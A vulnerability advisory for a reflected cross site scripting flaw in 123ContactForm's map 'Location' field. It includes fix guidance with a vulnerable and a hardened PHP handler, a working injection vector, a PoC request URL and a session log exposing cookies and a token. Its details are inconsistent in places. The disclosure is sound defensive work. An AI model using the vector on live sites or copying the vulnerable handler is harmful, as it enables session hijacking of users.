123ContactForm – Cross Site Scripting Vulnerability

A client-side cross site scripting vulnerability has been discovered in the 123Contact Form web-application. The security vulnerability allows remote attackers to inject malicious script code into client-side browser requests.

A client-side cross site scripting vulnerability is located in the `Location` input field. The vulnerability could allow remote attackers to execute JavaScript in the web browser of a user or administrator and compromise session credentials. The attacker can connect to a third account to trigger the issue without knowing the password.

The security risk of the XSS vulnerability is estimated as medium, with a CVSS (Common Vulnerability Scoring System) score of 3.3. Exploitation of the non-persistent cross site scripting vulnerability requires low or medium user interaction and no privileged web-application user account. Successful exploitation results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious sources and non-persistent manipulation of affected or connected application modules.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] Location – Map Pro

Vulnerable File(s):
[+] ajax_save_field.php

Vulnerable Parameter(s):
[+] value

Date of Discovery:
==================

2016-10-16

Exploitation Technique:
=======================

Local

Platform Tested:
===============

Windows 7

Solution – Fix & Patch:
=======================

The vulnerability can be patched by securely parsing the vulnerable `value` parameter in the affected ajax PHP file. Restrict the input by disallowing special characters and filtering script code tags. Encode the vulnerable output location according to its context to prevent execution of malicious script code in the form.
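As an added example, not code from the advisory or from 123ContactForm, the reflected-value pattern described above beside a hardened version of the same handler. The handler, function names and the length limit are assumptions standing in for ajax_save_field.php.

```php
<?php
// Added example (not 123ContactForm's code): a hypothetical stand-in for
// the ajax handler that reflects the "value" parameter into the form.

// Vulnerable pattern: "value" is echoed into an HTML attribute unchanged,
// so a quote followed by ">" terminates the attribute and the tag, and
// whatever follows is parsed as new markup by the browser.
function render_field_vulnerable(array $get): string
{
    $value = $get['value'] ?? '';
    return '<input type="text" name="value" value="' . $value . '">';
}

// Input restriction: a map location is plain text, so reject control
// characters and cap its length (assumed limit). Returns null on reject.
function validate_location(string $value, int $maxLen = 200): ?string
{
    if (strlen($value) > $maxLen) {
        return null;
    }
    if (preg_match('/[\x00-\x1F\x7F]/', $value)) {
        return null;
    }
    return $value;
}

// Hardened pattern: validate, then encode for the HTML attribute context.
// ENT_QUOTES escapes both ' and ", so the attribute cannot be closed early;
// <, > and & are escaped as well, so no new tags can be introduced.
function render_field_hardened(array $get): string
{
    $value = validate_location($get['value'] ?? '');
    if ($value === null) {
        http_response_code(400);
        return 'Invalid location value';
    }
    $safe = htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="value" value="' . $safe . '">';
}

// Constructed sample input using the same vector the advisory's PoC uses.
$sample = ['value' => '\'"><img src=x onerror=alert(domain)>'];

echo "Vulnerable: ", render_field_vulnerable($sample), PHP_EOL;
echo "Hardened:   ", render_field_hardened($sample), PHP_EOL;
```

In the hardened output the quotes and angle brackets arrive as entities, so the browser renders the vector as literal attribute text instead of a new `img` element. If the endpoint answers with JSON rather than HTML, `json_encode` with `JSON_HEX_TAG | JSON_HEX_QUOT | JSON_HEX_APOS` is the matching encoder for that context.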

Proof of Concept (PoC):
=======================

The cross site scripting vulnerability can be exploited by remote attackers with a web-application user account and with low or medium user interaction.
For a security demonstration, or to reproduce the vulnerability, follow the information and steps below.

Manual steps to reproduce the vulnerability ...
1. Create a user account
2. Connect to the dashboard and click on "Create New Form"
3. Click on "Event Registration Form"
4. Click on the Google Map at the bottom and click on the link "Customize Map"
5. Customize Map opens a window
6. Copy and paste the vector ( '"><img src=x onerror=alert(domain)> ) into the "Location" input to execute it via the value parameter
7. Finally click "Save"
8. A message box appears, showing that the payload was executed via the value parameter


--- PoC Pictures ---
http://zwx.fr/POCXSS.PNG
http://zwx.fr/POCXSS2.PNG


PoC: URL
https://123contactform.localhost/ajax_save_field.php
?cid=22812003&fid=2248753&pro=map_c_values&
islikert=0&value=[CLIENT SIDE SCRIPT CODE INJECT!]&
selectedformcreated=1476438146&selecteduser=1077591&
cacheKiller=0.05597585558969986&selectedFieldControl=0&
containerForEditorActions=1


--- PoC Session Logs [GET] ---
Status: 200 [OK]
Host: www.123contactform.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
theToken: d2767e1cdf526c38c5a8d14e8
Referer: https://www.123contactform.com/index.php?p=edit_fields&id=2248753&action=firsttime
Cookie: x-channel=website; x-subchannel=website; x-source=organic; user_type=unknown; x-campaign=no-campaign; x-landing=%2Fsecurity-acknowledgements.htm; 123cf=64AEAFD7-855C-40D4-BAEE-406B081CF758; referer123cookie=http%3A%2F%2Fbugsheet.com%2Fdirectory; AWSELB=596B2BAD0280A921E426D1B649308CC69A1C856B743EDCBCE34D07E0A9EC55A2DFD9A6A3D2B6C5F677E4C749D525B848D39C268A28FBC6E570CCD431ECA0C0ECD30A1D13A4; SnapABugHistory=2#; _ga=GA1.2.2031563181.1476410572; __ar_v4=WFH7JRHHDNEVZPPCUQ2ABR%3A20161013%3A54%7CMLVDQJATP5EPDMGBRC5TRU%3A20161013%3A54%7CILTNEPP2HZFL7AMBEUMFOE%3A20161013%3A54; __reff=[[www.123contactform.com/security-acknowledgements.htm]]bugsheet.com&1476410574641.1476412397387.7|[[www.123contactform.com/index.php]](direct)&1476437441090.1476437441090.1; spid=CD6108C6-3D7D-491B-8934-5156A4E6A99B; sp_apnxid=3900529803954807116; mktz_client=%7B%22is_returning%22%3A%221%22%2C%22uid%22%3A%2213325530231307318897%22%2C%22session%22%3A%22ses499300756ion%22%2C%22views%22%3A2%2C%22referer_url%22%3A%22http%3A//www.123contactform.com/security-acknowledgements.htm%22%2C%22referer_domain%22%3A%22www.123contactform.com%22%2C%22referer_type%22%3A%22refferal%22%2C%22visits%22%3A1%2C%22landing%22%3A%22http%3A//www.123contactform.com/%22%2C%22enter_at%22%3A%222016-10-14%7C4%3A3%3A14%22%2C%22first_visit%22%3A%222016-10-14%7C4%3A3%3A14%22%2C%22last_visit%22%3A%222016-10-14%7C4%3A3%3A14%22%2C%22last_variation%22%3A%22%22%2C%22utm_source%22%3Afalse%2C%22utm_term%22%3Afalse%2C%22utm_campaign%22%3Afalse%2C%22utm_content%22%3Afalse%2C%22utm_medium%22%3Afalse%7D; optimizelySegments=%7B%223013120790%22%3A%22false%22%2C%223022890169%22%3A%22direct%22%2C%223024180249%22%3A%22ff%22%7D; optimizelyEndUserId=oeu1476410633006r0.5762439056508796; optimizelyBuckets=%7B%7D; __utma=95039516.2031563181.1476410572.1476410679.1476410679.1; __utmz=95039516.1476410679.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1s49us046u1nca63s90a4lbpq2; 
SnapABugRef=http%3A%2F%2Fwww.123contactform.com%2Fsecurity-acknowledgements.htm%20http%3A%2F%2Fbugsheet.com%2Fdirectory; SnapABugVisit=27#1476437435; sp_ssid=1476437441027; __sreff=1476437441090.1476437441090.1; UTM_usrprf=0%7C1476410503; UTM_last_login=1476437278; acknowledgeCookie=1; _gat_UA-305159-5=1; SnapABugChatWindow=%7C0%7C-1%2C0%2C-1%2C0
Connection: keep-alive
-
https://www.123contactform.com/ajax_save_field.php?cid=22812003&fid=2248753&pro=map_c_values&islikert=0&value='"><img src=x onerror=alert(domain)>&selectedformcreated=1476438146&selecteduser=1077591&cacheKiller=0.05597585558969986&selectedFieldControl=0&containerForEditorActions=1
